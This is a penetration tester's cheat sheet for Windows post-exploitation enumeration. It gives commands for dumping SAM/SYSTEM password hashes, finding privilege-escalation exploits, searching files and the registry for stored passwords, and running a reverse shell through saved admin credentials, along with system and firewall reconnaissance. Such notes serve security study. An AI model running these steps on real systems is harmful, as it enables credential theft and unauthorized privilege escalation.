🔎Windows Post Enumeration

If SYSTEM or SAM found in winPEAS use one of this:

https://github.com/CiscoCXSecurity/creddump7/blob/master/pwdump.py

windows/system32/config/SAM(or SYSTEM) is where password hashes are located

If AD ntds.dit will have the database

To get the hash:

impacket-secretsdump -sam SAM -system SYSTEM local

python2 pwdump.py /tools /SYSTEM /tools/SAM

GitHub - h4ms1k/samdumpGitHub

If starts with 3186 it is an empty string

Automatic

Wesng:

python3 wesng.py /tools/systeminfo.txt -i 'Elevation of Privilege' --exploit-only | more

Manual:

Get stored passwords:

cmdkey /list

runas /savecred /user:admin C:\Path\to\reverse.exe

findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml 
findstr /SIM /C:"GitLab" *.txt  #Replace GitLab with any keyword

System info (cmd):

Chimichurri for Windows 2008 R1 & R2, Windows Vista and Windows 7

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

Check files with pass in name or .config in current directory recursively:

Run in temp or suspicious program directory

dir /s *pass* == *.config

List all scheduled tasks:

schtasks /query /fo LIST /v

To check all processes running:

get-process

Check password in registry:

reg query HKLM /f password /t REG_SZ /s

reg query HKCU /f password /t REG_SZ /s

Get patches:

wmic qfe

To get disks:

wmic logicaldisk

To check privileges:

whoami /priv

To check groups involved in:

whoami /groups

To check users:

net user

Can also check specific user with:

net user administrator

We can check group details from above command with:

net localgroup

To look at arp table:

arp -a 

Print route:

route print 

For active connections:

netstat -ano

Search password (In the directory)

findstr /si password *.txt *.ini *.config

Check Firewall and AV

To check windows defender

sc query windefend

Check all processes

sc queryex type= service

Check firewall :

netsh advfirewall firewall dump

netsh firewall show state

netsh firewall show config